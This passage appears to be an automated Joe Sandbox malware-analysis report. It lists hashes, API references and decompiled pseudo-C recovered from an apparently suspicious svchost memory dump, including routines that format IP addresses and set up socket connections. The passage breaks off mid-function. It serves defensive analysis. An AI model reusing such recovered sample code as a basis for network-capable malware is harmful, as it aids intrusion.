                                                                                                                                                                                                                                                                      • Instruction ID: b4162b3583ba2dec2d6c765e4cdbb5ffec497666bde8b264905ccdcb2170b9d4
                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 589d3e65630ef34cec759d841c4f9ee093c734cc23f38093e9c684df022fd702
                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: AB81D3B4E01209DBDF04CF98D984AEEB7B2BF48308F2485A9E41577390E735AA45DF91
                                                                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                      • Source File: 00000006.00000002.817211528.0000000004000000.00000040.00001000.00020000.00000000.sdmp, Offset: 04000000, based on PE: true
                                                                                                                                                                                                                                                                      • Associated: 00000006.00000002.817211528.000000000408A000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_6_2_4000000_svchost.jbxd
                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                      • API ID: codecvt
                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                      • API String ID: 3662085145-0
                                                                                                                                                                                                                                                                      • Opcode ID: ba7dc1fef3d58b80a497ec6308a1d58d0225431825f13d715bb00c9403d7ea51
                                                                                                                                                                                                                                                                      • Instruction ID: 8ef4f0843c548fec2a10bde5c14a40ad8c72f7d7392924089e823b54c74d7b66
                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: ba7dc1fef3d58b80a497ec6308a1d58d0225431825f13d715bb00c9403d7ea51
                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: E891C774A00208EFDB54DF94C894B9DBBB2FF48354F608259E9156B3A0D775EA82CF90
                                                                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                      C-Code - Quality: 52%
                                                                                                                                                                                                                                                                      			E040115C0(void* __ebx, unsigned int** __ecx, void* __edi, void* __esi) {
                                                                                                                                                                                                                                                                      				unsigned int* _v8;
                                                                                                                                                                                                                                                                      				signed short _v12;
                                                                                                                                                                                                                                                                      				signed int _v16;
                                                                                                                                                                                                                                                                      				intOrPtr _v28;
                                                                                                                                                                                                                                                                      				short _v30;
                                                                                                                                                                                                                                                                      				char _v32;
                                                                                                                                                                                                                                                                      				char _v64;
                                                                                                                                                                                                                                                                      				unsigned int* _v68;
                                                                                                                                                                                                                                                                      				intOrPtr _v72;
                                                                                                                                                                                                                                                                      				unsigned int* _v76;
                                                                                                                                                                                                                                                                      				intOrPtr _v80;
                                                                                                                                                                                                                                                                      				intOrPtr _v84;
                                                                                                                                                                                                                                                                      				unsigned int* _v88;
                                                                                                                                                                                                                                                                      				unsigned int* _v92;
                                                                                                                                                                                                                                                                      				intOrPtr _v96;
                                                                                                                                                                                                                                                                      				unsigned int* _v100;
                                                                                                                                                                                                                                                                      				unsigned int* _v104;
                                                                                                                                                                                                                                                                      				unsigned int** _v108;
                                                                                                                                                                                                                                                                      				unsigned int* _v112;
                                                                                                                                                                                                                                                                      				unsigned int* _v116;
                                                                                                                                                                                                                                                                      				unsigned int* _t84;
                                                                                                                                                                                                                                                                      				intOrPtr _t97;
                                                                                                                                                                                                                                                                      				void* _t99;
                                                                                                                                                                                                                                                                      				intOrPtr _t103;
                                                                                                                                                                                                                                                                      				void* _t109;
                                                                                                                                                                                                                                                                      				void* _t152;
                                                                                                                                                                                                                                                                      				void* _t153;
                                                                                                                                                                                                                                                                      				signed int _t154;
                                                                                                                                                                                                                                                                      				void* _t155;
                                                                                                                                                                                                                                                                      				void* _t160;
                                                                                                                                                                                                                                                                      
                                                                                                                                                                                                                                                                      				_t153 = __esi;
                                                                                                                                                                                                                                                                      				_t152 = __edi;
                                                                                                                                                                                                                                                                      				_t109 = __ebx;
                                                                                                                                                                                                                                                                      				_v16 =  *0x429024 ^ _t154;
                                                                                                                                                                                                                                                                      				_v108 = __ecx;
                                                                                                                                                                                                                                                                      				_v8 = 0;
                                                                                                                                                                                                                                                                      				do {
                                                                                                                                                                                                                                                                      					if(( *_v108)[1] == 0) {
                                                                                                                                                                                                                                                                      						goto L7;
                                                                                                                                                                                                                                                                      					} else {
                                                                                                                                                                                                                                                                      						_t103 = E040070A0(( *_v108)[1]);
                                                                                                                                                                                                                                                                      						_t155 = _t155 + 4;
                                                                                                                                                                                                                                                                      						_v80 = _t103;
                                                                                                                                                                                                                                                                      						if(_v80 <= 0) {
                                                                                                                                                                                                                                                                      							goto L7;
                                                                                                                                                                                                                                                                      						} else {
                                                                                                                                                                                                                                                                      							_v84 = E04020CE0(8);
                                                                                                                                                                                                                                                                      							if(_v84 == 0) {
                                                                                                                                                                                                                                                                      								_v112 = 0;
                                                                                                                                                                                                                                                                      							} else {
                                                                                                                                                                                                                                                                      								_v112 = E0401F4E0(_v84);
                                                                                                                                                                                                                                                                      							}
                                                                                                                                                                                                                                                                      							_v8 = _v112;
                                                                                                                                                                                                                                                                      							_t149 =  *_v108;
                                                                                                                                                                                                                                                                      							E0401FC90(_t109, _v8, _t152, _t153, ( *_v108)[1], _v80);
                                                                                                                                                                                                                                                                      						}
                                                                                                                                                                                                                                                                      					}
                                                                                                                                                                                                                                                                      					break;
                                                                                                                                                                                                                                                                      					L7:
                                                                                                                                                                                                                                                                      					_v88 = E04020CE0(0x11);
                                                                                                                                                                                                                                                                      					_v68 = _v88;
                                                                                                                                                                                                                                                                      					E04007010(_t152, _v68, 0, 0x11);
                                                                                                                                                                                                                                                                      					 *0x4251f8(_v68, 0x10, 0x427088, ( *( *_v108) >> 0x00000010 & 0xffff) >> 0x00000008 & 0xff,  *( *_v108) >> 0x00000010 & 0xff, ( *( *_v108) & 0xffff) >> 0x00000008 & 0xff,  *( *_v108) & 0xff);
                                                                                                                                                                                                                                                                      					_t84 = E04020CE0(0x401);
                                                                                                                                                                                                                                                                      					_t155 = _t155 + 0x30;
                                                                                                                                                                                                                                                                      					_v92 = _t84;
                                                                                                                                                                                                                                                                      					_v76 = _v92;
                                                                                                                                                                                                                                                                      					_v12 = 0x6987;
                                                                                                                                                                                                                                                                      					_v32 = 2;
                                                                                                                                                                                                                                                                      					_v28 =  *0x425258(_v68);
                                                                                                                                                                                                                                                                      					_v30 =  *0x425278(_v12 & 0x0000ffff);
                                                                                                                                                                                                                                                                      					_t149 =  &_v64;
                                                                                                                                                                                                                                                                      					_v72 =  *0x425250( &_v32, 0x10, _v76, 0x401,  &_v64, 0x20, 8);
                                                                                                                                                                                                                                                                      					if(_v72 == 0) {
                                                                                                                                                                                                                                                                      						_t97 = E04020CE0(8);
                                                                                                                                                                                                                                                                      						_t160 = _t155 + 4;
                                                                                                                                                                                                                                                                      						_v96 = _t97;
                                                                                                                                                                                                                                                                      						if(_v96 == 0) {
                                                                                                                                                                                                                                                                      							_v116 = 0;
                                                                                                                                                                                                                                                                      						} else {
                                                                                                                                                                                                                                                                      							_v116 = E0401F4E0(_v96);
                                                                                                                                                                                                                                                                      						}
                                                                                                                                                                                                                                                                      						_t149 = _v116;
                                                                                                                                                                                                                                                                      						_v8 = _v116;
                                                                                                                                                                                                                                                                      						_t99 = E040070A0(_v76);
                                                                                                                                                                                                                                                                      						_t155 = _t160 + 4;
                                                                                                                                                                                                                                                                      						E0401FC90(_t109, _v8, _t152, _t153, _v76, _t99);
                                                                                                                                                                                                                                                                      					}
                                                                                                                                                                                                                                                                      					if(_v76 != 0) {
                                                                                                                                                                                                                                                                      						_t149 = _v76;
                                                                                                                                                                                                                                                                      						_v100 = _v76;
                                                                                                                                                                                                                                                                      						E04020CC0(_v100);
                                                                                                                                                                                                                                                                      						_t155 = _t155 + 4;
                                                                                                                                                                                                                                                                      						_v76 = 0x666;
                                                                                                                                                                                                                                                                      					}
                                                                                                                                                                                                                                                                      					if(_v68 != 0) {
                                                                                                                                                                                                                                                                      						_v104 = _v68;
                                                                                                                                                                                                                                                                      						_t149 = _v104;
                                                                                                                                                                                                                                                                      						E04020CC0(_v104);
                                                                                                                                                                                                                                                                      						_t155 = _t155 + 4;
                                                                                                                                                                                                                                                                      						_v68 = 0x666;
                                                                                                                                                                                                                                                                      					}
                                                                                                                                                                                                                                                                      				} while (0 != 0);
                                                                                                                                                                                                                                                                      				return E04006C8C(_v8, _t109, _v16 ^ _t154, _t149, _t152, _t153);
                                                                                                                                                                                                                                                                      			}

































                                                                                                                                                                                                                                                                      0x040115c0
                                                                                                                                                                                                                                                                      0x040115c0
                                                                                                                                                                                                                                                                      0x040115c0
                                                                                                                                                                                                                                                                      0x040115cd
                                                                                                                                                                                                                                                                      0x040115d0
                                                                                                                                                                                                                                                                      0x040115d3
                                                                                                                                                                                                                                                                      0x040115da
                                                                                                                                                                                                                                                                      0x040115e3
                                                                                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                                                                                      0x040115e5
                                                                                                                                                                                                                                                                      0x040115ee
                                                                                                                                                                                                                                                                      0x040115f3
                                                                                                                                                                                                                                                                      0x040115f6
                                                                                                                                                                                                                                                                      0x040115fd
                                                                                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                                                                                      0x040115ff
                                                                                                                                                                                                                                                                      0x04011609
                                                                                                                                                                                                                                                                      0x04011610
                                                                                                                                                                                                                                                                      0x0401161f
                                                                                                                                                                                                                                                                      0x04011612
                                                                                                                                                                                                                                                                      0x0401161a
                                                                                                                                                                                                                                                                      0x0401161a
                                                                                                                                                                                                                                                                      0x04011629
                                                                                                                                                                                                                                                                      0x04011633
                                                                                                                                                                                                                                                                      0x0401163c
                                                                                                                                                                                                                                                                      0x0401163c
                                                                                                                                                                                                                                                                      0x040115fd
                                                                                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                                                                                      0x04011646
                                                                                                                                                                                                                                                                      0x04011650
                                                                                                                                                                                                                                                                      0x04011656
                                                                                                                                                                                                                                                                      0x04011661
                                                                                                                                                                                                                                                                      0x040116e5
                                                                                                                                                                                                                                                                      0x040116f3
                                                                                                                                                                                                                                                                      0x040116f8
                                                                                                                                                                                                                                                                      0x040116fb
                                                                                                                                                                                                                                                                      0x04011701
                                                                                                                                                                                                                                                                      0x04011709
                                                                                                                                                                                                                                                                      0x04011712
                                                                                                                                                                                                                                                                      0x04011720
                                                                                                                                                                                                                                                                      0x0401172e
                                                                                                                                                                                                                                                                      0x04011736
                                                                                                                                                                                                                                                                      0x0401174f
                                                                                                                                                                                                                                                                      0x04011756
                                                                                                                                                                                                                                                                      0x0401175a
                                                                                                                                                                                                                                                                      0x0401175f
                                                                                                                                                                                                                                                                      0x04011762
                                                                                                                                                                                                                                                                      0x04011769
                                                                                                                                                                                                                                                                      0x04011778
                                                                                                                                                                                                                                                                      0x0401176b
                                                                                                                                                                                                                                                                      0x04011773
                                                                                                                                                                                                                                                                      0x04011773
                                                                                                                                                                                                                                                                      0x0401177f
                                                                                                                                                                                                                                                                      0x04011782
                                                                                                                                                                                                                                                                      0x04011789
                                                                                                                                                                                                                                                                      0x0401178e
                                                                                                                                                                                                                                                                      0x04011799
                                                                                                                                                                                                                                                                      0x04011799
                                                                                                                                                                                                                                                                      0x040117a2
                                                                                                                                                                                                                                                                      0x040117a4
                                                                                                                                                                                                                                                                      0x040117a7
                                                                                                                                                                                                                                                                      0x040117ae
                                                                                                                                                                                                                                                                      0x040117b3
                                                                                                                                                                                                                                                                      0x040117b6
                                                                                                                                                                                                                                                                      0x040117b6
                                                                                                                                                                                                                                                                      0x040117c1
                                                                                                                                                                                                                                                                      0x040117c6
                                                                                                                                                                                                                                                                      0x040117c9
                                                                                                                                                                                                                                                                      0x040117cd
                                                                                                                                                                                                                                                                      0x040117d2
                                                                                                                                                                                                                                                                      0x040117d5
                                                                                                                                                                                                                                                                      0x040117d5
                                                                                                                                                                                                                                                                      0x040117dc
                                                                                                                                                                                                                                                                      0x040117f4

                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                      • _strlen.LIBCMT ref: 040115EE
                                                                                                                                                                                                                                                                      • std::_Iterator_base::_Iterator_base.LIBCPMTD ref: 04011615
                                                                                                                                                                                                                                                                      • _memset.LIBCMT ref: 04011661
                                                                                                                                                                                                                                                                      • std::_Iterator_base::_Iterator_base.LIBCPMTD ref: 0401176E
                                                                                                                                                                                                                                                                      • _strlen.LIBCMT ref: 04011789
                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                      • Source File: 00000006.00000002.817211528.0000000004000000.00000040.00001000.00020000.00000000.sdmp, Offset: 04000000, based on PE: true
                                                                                                                                                                                                                                                                      • Associated: 00000006.00000002.817211528.000000000408A000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_6_2_4000000_svchost.jbxd
                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                      • API ID: Iterator_baseIterator_base::__strlenstd::_$_memset
                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                      • API String ID: 2716363198-0
                                                                                                                                                                                                                                                                      • Opcode ID: 0abad2840db399aae90639b031553a88c883544166d49a401e7ee45cba732544
                                                                                                                                                                                                                                                                      • Instruction ID: 26b02190921c373d841446d0dad60ddd34c3bc106182d84ff6dd49c6febfbb10
                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 0abad2840db399aae90639b031553a88c883544166d49a401e7ee45cba732544
                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: CB7128B4E00318DFEB14DFA4D884BADB7B1FF48308F248128E609AB390D775A945DB51
                                                                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                      C-Code - Quality: 75%
                                                                                                                                                                                                                                                                      			E04012470(void* __ebx, intOrPtr __ecx, void* __edi, void* __esi) {
                                                                                                                                                                                                                                                                      				char _v8;
                                                                                                                                                                                                                                                                      				intOrPtr* _v12;
                                                                                                                                                                                                                                                                      				signed int _v16;
                                                                                                                                                                                                                                                                      				char _v20;
                                                                                                                                                                                                                                                                      				intOrPtr _v24;
                                                                                                                                                                                                                                                                      				intOrPtr _v28;
                                                                                                                                                                                                                                                                      				intOrPtr _v32;
                                                                                                                                                                                                                                                                      				char _v36;
                                                                                                                                                                                                                                                                      				intOrPtr _v40;
                                                                                                                                                                                                                                                                      				void* _v44;
                                                                                                                                                                                                                                                                      				intOrPtr _v48;
                                                                                                                                                                                                                                                                      				intOrPtr _v52;
                                                                                                                                                                                                                                                                      				intOrPtr _v56;
                                                                                                                                                                                                                                                                      				intOrPtr _v60;
                                                                                                                                                                                                                                                                      				intOrPtr _v64;
                                                                                                                                                                                                                                                                      				intOrPtr _v68;
                                                                                                                                                                                                                                                                      				intOrPtr _v72;
                                                                                                                                                                                                                                                                      				intOrPtr _v76;
                                                                                                                                                                                                                                                                      				intOrPtr _v80;
                                                                                                                                                                                                                                                                      				intOrPtr* _v84;
                                                                                                                                                                                                                                                                      				intOrPtr _v88;
                                                                                                                                                                                                                                                                      				intOrPtr _v92;
                                                                                                                                                                                                                                                                      				intOrPtr _t74;
                                                                                                                                                                                                                                                                      				intOrPtr _t83;
                                                                                                                                                                                                                                                                      				intOrPtr _t99;
                                                                                                                                                                                                                                                                      				void* _t101;
                                                                                                                                                                                                                                                                      				void* _t108;
                                                                                                                                                                                                                                                                      				void* _t156;
                                                                                                                                                                                                                                                                      				void* _t157;
                                                                                                                                                                                                                                                                      				signed int _t158;
                                                                                                                                                                                                                                                                      				void* _t159;
                                                                                                                                                                                                                                                                      				void* _t163;
                                                                                                                                                                                                                                                                      
                                                                                                                                                                                                                                                                      				_t157 = __esi;
                                                                                                                                                                                                                                                                      				_t156 = __edi;
                                                                                                                                                                                                                                                                      				_t108 = __ebx;
                                                                                                                                                                                                                                                                      				_v16 =  *0x429024 ^ _t158;
                                                                                                                                                                                                                                                                      				_v80 = __ecx;
                                                                                                                                                                                                                                                                      				_v8 = 0;
                                                                                                                                                                                                                                                                      				do {
                                                                                                                                                                                                                                                                      					_v36 =  *0x426fa8;
                                                                                                                                                                                                                                                                      					_v32 =  *0x426fac;
                                                                                                                                                                                                                                                                      					_v28 =  *0x426fb0;
                                                                                                                                                                                                                                                                      					_v24 =  *0x426fb4;
                                                                                                                                                                                                                                                                      					_v20 =  *0x426fb8;
                                                                                                                                                                                                                                                                      					_t74 = E04020CE0(8);
                                                                                                                                                                                                                                                                      					_t159 = _t159 + 4;
                                                                                                                                                                                                                                                                      					_v52 = _t74;
                                                                                                                                                                                                                                                                      					if(_v52 == 0) {
                                                                                                                                                                                                                                                                      						_v84 = 0;
                                                                                                                                                                                                                                                                      					} else {
                                                                                                                                                                                                                                                                      						_v84 = E0401F4E0(_v52);
                                                                                                                                                                                                                                                                      					}
                                                                                                                                                                                                                                                                      					_v12 = _v84;
                                                                                                                                                                                                                                                                      					E0401FC90(_t108, _v12, _t156, _t157,  &_v36, 0x10);
                                                                                                                                                                                                                                                                      					if((E04015C60(_t108, _v80, _v84, _v12) & 0x000000ff) != 0) {
                                                                                                                                                                                                                                                                      						_v44 = 0;
                                                                                                                                                                                                                                                                      						_t83 = E0401BCB0(_t156, 4,  *_v12,  &_v44);
                                                                                                                                                                                                                                                                      						_t159 = _t159 + 0xc;
                                                                                                                                                                                                                                                                      						_v40 = _t83;
                                                                                                                                                                                                                                                                      						if(_v40 > 0) {
                                                                                                                                                                                                                                                                      							_v56 = E04020CE0(0x11);
                                                                                                                                                                                                                                                                      							_v48 = _v56;
                                                                                                                                                                                                                                                                      							E04007010(_t156, _v48, 0, 0x11);
                                                                                                                                                                                                                                                                      							 *0x4251f8(_v48, 0x10, 0x426fbc,  *( *_v44 + 4) & 0xff, ( *( *_v44 + 4) & 0xffff) >> 0x00000008 & 0xff,  *( *_v44 + 4) >> 0x00000010 & 0xff, ( *( *_v44 + 4) >> 0x00000010 & 0xffff) >> 0x00000008 & 0xff);
                                                                                                                                                                                                                                                                      							_t99 = E04020CE0(8);
                                                                                                                                                                                                                                                                      							_t163 = _t159 + 0x30;
                                                                                                                                                                                                                                                                      							_v60 = _t99;
                                                                                                                                                                                                                                                                      							if(_v60 == 0) {
                                                                                                                                                                                                                                                                      								_v88 = 0;
                                                                                                                                                                                                                                                                      							} else {
                                                                                                                                                                                                                                                                      								_v88 = E0401F4E0(_v60);
                                                                                                                                                                                                                                                                      							}
                                                                                                                                                                                                                                                                      							_v8 = _v88;
                                                                                                                                                                                                                                                                      							_t101 = E040070A0(_v48);
                                                                                                                                                                                                                                                                      							_t159 = _t163 + 4;
                                                                                                                                                                                                                                                                      							E0401FC90(_t108, _v8, _t156, _t157, _v48, _t101);
                                                                                                                                                                                                                                                                      							if(_v48 != 0) {
                                                                                                                                                                                                                                                                      								_v64 = _v48;
                                                                                                                                                                                                                                                                      								E04020CC0(_v64);
                                                                                                                                                                                                                                                                      								_t159 = _t159 + 4;
                                                                                                                                                                                                                                                                      								_v48 = 0x666;
                                                                                                                                                                                                                                                                      							}
                                                                                                                                                                                                                                                                      							if(_v44 != 0) {
                                                                                                                                                                                                                                                                      								_v68 = _v44;
                                                                                                                                                                                                                                                                      								E04020CC0(_v68);
                                                                                                                                                                                                                                                                      								_t159 = _t159 + 4;
                                                                                                                                                                                                                                                                      								_v44 = 0x666;
                                                                                                                                                                                                                                                                      							}
                                                                                                                                                                                                                                                                      						}
                                                                                                                                                                                                                                                                      					}
                                                                                                                                                                                                                                                                      					if(_v12 != 0) {
                                                                                                                                                                                                                                                                      						_v76 = _v12;
                                                                                                                                                                                                                                                                      						_v72 = _v76;
                                                                                                                                                                                                                                                                      						if(_v72 == 0) {
                                                                                                                                                                                                                                                                      							_v92 = 0;
                                                                                                                                                                                                                                                                      						} else {
                                                                                                                                                                                                                                                                      							_v92 = E04004EA0(_v72, 1);
                                                                                                                                                                                                                                                                      						}
                                                                                                                                                                                                                                                                      						_v12 = 0x666;
                                                                                                                                                                                                                                                                      					}
                                                                                                                                                                                                                                                                      				} while (0 != 0);
                                                                                                                                                                                                                                                                      				return E04006C8C(_v8, _t108, _v16 ^ _t158, 0, _t156, _t157);
                                                                                                                                                                                                                                                                      			}



































                                                                                                                                                                                                                                                                      0x04012470
                                                                                                                                                                                                                                                                      0x04012470
                                                                                                                                                                                                                                                                      0x04012470
                                                                                                                                                                                                                                                                      0x0401247d
                                                                                                                                                                                                                                                                      0x04012480
                                                                                                                                                                                                                                                                      0x04012483
                                                                                                                                                                                                                                                                      0x0401248a
                                                                                                                                                                                                                                                                      0x0401248f
                                                                                                                                                                                                                                                                      0x04012498
                                                                                                                                                                                                                                                                      0x040124a1
                                                                                                                                                                                                                                                                      0x040124a9
                                                                                                                                                                                                                                                                      0x040124b2
                                                                                                                                                                                                                                                                      0x040124b7
                                                                                                                                                                                                                                                                      0x040124bc
                                                                                                                                                                                                                                                                      0x040124bf
                                                                                                                                                                                                                                                                      0x040124c6
                                                                                                                                                                                                                                                                      0x040124d5
                                                                                                                                                                                                                                                                      0x040124c8
                                                                                                                                                                                                                                                                      0x040124d0
                                                                                                                                                                                                                                                                      0x040124d0
                                                                                                                                                                                                                                                                      0x040124df
                                                                                                                                                                                                                                                                      0x040124eb
                                                                                                                                                                                                                                                                      0x04012501
                                                                                                                                                                                                                                                                      0x04012507
                                                                                                                                                                                                                                                                      0x0401251a
                                                                                                                                                                                                                                                                      0x0401251f
                                                                                                                                                                                                                                                                      0x04012522
                                                                                                                                                                                                                                                                      0x04012529
                                                                                                                                                                                                                                                                      0x04012539
                                                                                                                                                                                                                                                                      0x0401253f
                                                                                                                                                                                                                                                                      0x0401254a
                                                                                                                                                                                                                                                                      0x040125d3
                                                                                                                                                                                                                                                                      0x040125de
                                                                                                                                                                                                                                                                      0x040125e3
                                                                                                                                                                                                                                                                      0x040125e6
                                                                                                                                                                                                                                                                      0x040125ed
                                                                                                                                                                                                                                                                      0x040125fc
                                                                                                                                                                                                                                                                      0x040125ef
                                                                                                                                                                                                                                                                      0x040125f7
                                                                                                                                                                                                                                                                      0x040125f7
                                                                                                                                                                                                                                                                      0x04012606
                                                                                                                                                                                                                                                                      0x0401260d
                                                                                                                                                                                                                                                                      0x04012612
                                                                                                                                                                                                                                                                      0x0401261d
                                                                                                                                                                                                                                                                      0x04012626
                                                                                                                                                                                                                                                                      0x0401262b
                                                                                                                                                                                                                                                                      0x04012632
                                                                                                                                                                                                                                                                      0x04012637
                                                                                                                                                                                                                                                                      0x0401263a
                                                                                                                                                                                                                                                                      0x0401263a
                                                                                                                                                                                                                                                                      0x04012645
                                                                                                                                                                                                                                                                      0x0401264a
                                                                                                                                                                                                                                                                      0x04012651
                                                                                                                                                                                                                                                                      0x04012656
                                                                                                                                                                                                                                                                      0x04012659
                                                                                                                                                                                                                                                                      0x04012659
                                                                                                                                                                                                                                                                      0x04012645
                                                                                                                                                                                                                                                                      0x04012529
                                                                                                                                                                                                                                                                      0x04012664
                                                                                                                                                                                                                                                                      0x04012669
                                                                                                                                                                                                                                                                      0x0401266f
                                                                                                                                                                                                                                                                      0x04012676
                                                                                                                                                                                                                                                                      0x04012687
                                                                                                                                                                                                                                                                      0x04012678
                                                                                                                                                                                                                                                                      0x04012682
                                                                                                                                                                                                                                                                      0x04012682
                                                                                                                                                                                                                                                                      0x0401268e
                                                                                                                                                                                                                                                                      0x0401268e
                                                                                                                                                                                                                                                                      0x04012695
                                                                                                                                                                                                                                                                      0x040126ad

                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                      • std::_Iterator_base::_Iterator_base.LIBCPMTD ref: 040124CB
                                                                                                                                                                                                                                                                      • _memset.LIBCMT ref: 0401254A
                                                                                                                                                                                                                                                                      • std::_Iterator_base::_Iterator_base.LIBCPMTD ref: 040125F2
                                                                                                                                                                                                                                                                      • _strlen.LIBCMT ref: 0401260D
                                                                                                                                                                                                                                                                      • codecvt.LIBCPMTD ref: 0401267D
                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                      • Source File: 00000006.00000002.817211528.0000000004000000.00000040.00001000.00020000.00000000.sdmp, Offset: 04000000, based on PE: true
                                                                                                                                                                                                                                                                      • Associated: 00000006.00000002.817211528.000000000408A000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_6_2_4000000_svchost.jbxd
                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                      • API ID: Iterator_baseIterator_base::_std::_$_memset_strlencodecvt
                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                      • API String ID: 2459447590-0
                                                                                                                                                                                                                                                                      • Opcode ID: e9ae77fbe599c57f9ed2e64cca4674112824ea2fac37f94927e6576c1164366d
                                                                                                                                                                                                                                                                      • Instruction ID: 2d0a0b2a9c0e8f4d9cfb9b2fe2ef08dc32606c7a33a305a0369b3e2b17122581
                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: e9ae77fbe599c57f9ed2e64cca4674112824ea2fac37f94927e6576c1164366d
                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 837138B0E002199FEB14DFA8D984BEDBBB1FF88318F148169E405BB390D775A944CB54
                                                                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                      C-Code - Quality: 91%
                                                                                                                                                                                                                                                                      			E040135C0(void* __ebx, intOrPtr* __ecx, intOrPtr _a4) {
                                                                                                                                                                                                                                                                      				signed int _v8;
                                                                                                                                                                                                                                                                      				signed int _v9;
                                                                                                                                                                                                                                                                      				intOrPtr _v16;
                                                                                                                                                                                                                                                                      				intOrPtr* _v20;
                                                                                                                                                                                                                                                                      				intOrPtr _v24;
                                                                                                                                                                                                                                                                      				intOrPtr _v28;
                                                                                                                                                                                                                                                                      				intOrPtr _v32;
                                                                                                                                                                                                                                                                      				intOrPtr _v36;
                                                                                                                                                                                                                                                                      				intOrPtr _v40;
                                                                                                                                                                                                                                                                      				intOrPtr _v44;
                                                                                                                                                                                                                                                                      				intOrPtr _v48;
                                                                                                                                                                                                                                                                      				intOrPtr* _v52;
                                                                                                                                                                                                                                                                      				intOrPtr _v56;
                                                                                                                                                                                                                                                                      				intOrPtr* _v60;
                                                                                                                                                                                                                                                                      				intOrPtr _v64;
                                                                                                                                                                                                                                                                      				intOrPtr _v68;
                                                                                                                                                                                                                                                                      				intOrPtr _v72;
                                                                                                                                                                                                                                                                      				intOrPtr _t81;
                                                                                                                                                                                                                                                                      				intOrPtr _t92;
                                                                                                                                                                                                                                                                      				intOrPtr _t95;
                                                                                                                                                                                                                                                                      				void* _t98;
                                                                                                                                                                                                                                                                      				void* _t128;
                                                                                                                                                                                                                                                                      
                                                                                                                                                                                                                                                                      				_t98 = __ebx;
                                                                                                                                                                                                                                                                      				_v52 = __ecx;
                                                                                                                                                                                                                                                                      				_v8 = 0;
                                                                                                                                                                                                                                                                      				_v9 = 0;
                                                                                                                                                                                                                                                                      				while(_a4 != 0) {
                                                                                                                                                                                                                                                                      					if( *((intOrPtr*)( *_v52 + 0x2c)) >= 1) {
                                                                                                                                                                                                                                                                      						_v16 = 0;
                                                                                                                                                                                                                                                                      						while(_v16 <  *((intOrPtr*)( *_v52 + 0x2c))) {
                                                                                                                                                                                                                                                                      							_t81 = E04020CE0(8);
                                                                                                                                                                                                                                                                      							_t128 = _t128 + 4;
                                                                                                                                                                                                                                                                      							_v28 = _t81;
                                                                                                                                                                                                                                                                      							if(_v28 == 0) {
                                                                                                                                                                                                                                                                      								_v60 = 0;
                                                                                                                                                                                                                                                                      							} else {
                                                                                                                                                                                                                                                                      								_v60 = E0401F4E0(_v28);
                                                                                                                                                                                                                                                                      							}
                                                                                                                                                                                                                                                                      							_v20 = _v60;
                                                                                                                                                                                                                                                                      							E0401F9F0(_t98, _v20, _a4,  *((intOrPtr*)(_a4 + 0x1c)),  *((intOrPtr*)(_a4 + 0x20)), 0);
                                                                                                                                                                                                                                                                      							 *((intOrPtr*)(_v52 + 0x10)) = _v16;
                                                                                                                                                                                                                                                                      							if((E04015C60(_t98, _v52, _v16, _v20) & 0x000000ff) != 0) {
                                                                                                                                                                                                                                                                      								if(_v8 == 0) {
                                                                                                                                                                                                                                                                      									_t92 = E04020CE0(8);
                                                                                                                                                                                                                                                                      									_t128 = _t128 + 4;
                                                                                                                                                                                                                                                                      									_v32 = _t92;
                                                                                                                                                                                                                                                                      									if(_v32 == 0) {
                                                                                                                                                                                                                                                                      										_v64 = 0;
                                                                                                                                                                                                                                                                      									} else {
                                                                                                                                                                                                                                                                      										_v64 = E0401F4E0(_v32);
                                                                                                                                                                                                                                                                      									}
                                                                                                                                                                                                                                                                      									_v8 = _v64;
                                                                                                                                                                                                                                                                      								}
                                                                                                                                                                                                                                                                      								E0401F9F0(_t98, _v8, _v20,  *_v20,  *((intOrPtr*)(_v20 + 4)), 0);
                                                                                                                                                                                                                                                                      							} else {
                                                                                                                                                                                                                                                                      								_v9 = 1;
                                                                                                                                                                                                                                                                      							}
                                                                                                                                                                                                                                                                      							if(_v20 != 0) {
                                                                                                                                                                                                                                                                      								_v40 = _v20;
                                                                                                                                                                                                                                                                      								_v36 = _v40;
                                                                                                                                                                                                                                                                      								if(_v36 == 0) {
                                                                                                                                                                                                                                                                      									_v68 = 0;
                                                                                                                                                                                                                                                                      								} else {
